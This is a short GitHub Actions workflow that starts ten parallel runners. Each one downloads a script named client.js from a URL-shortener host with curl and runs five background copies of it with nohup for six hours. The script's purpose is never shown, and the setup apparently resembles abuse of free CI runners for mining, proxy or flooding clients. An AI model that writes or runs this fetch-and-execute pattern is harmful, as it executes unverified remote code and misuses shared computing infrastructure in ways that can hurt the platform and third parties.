name: Run Node.js Script on 10 Machines

on:
  workflow_dispatch:

jobs:
  run-node:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        node_id: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
    steps:
      - name: Set up Node.js
        uses: actions/setup-node@v3
        with:
          node-version: '18'
      - name: Download client.js
        run: curl -o client.js https://curl.by/B176G/client.js
      - name: Run Node.js scripts in parallel
        run: |
          for i in $(seq 1 5); do
            nohup node client.js > client_$i.log 2>&1 &
          done
          sleep 21600  # 6 saat bekle, işlemleri sürdür
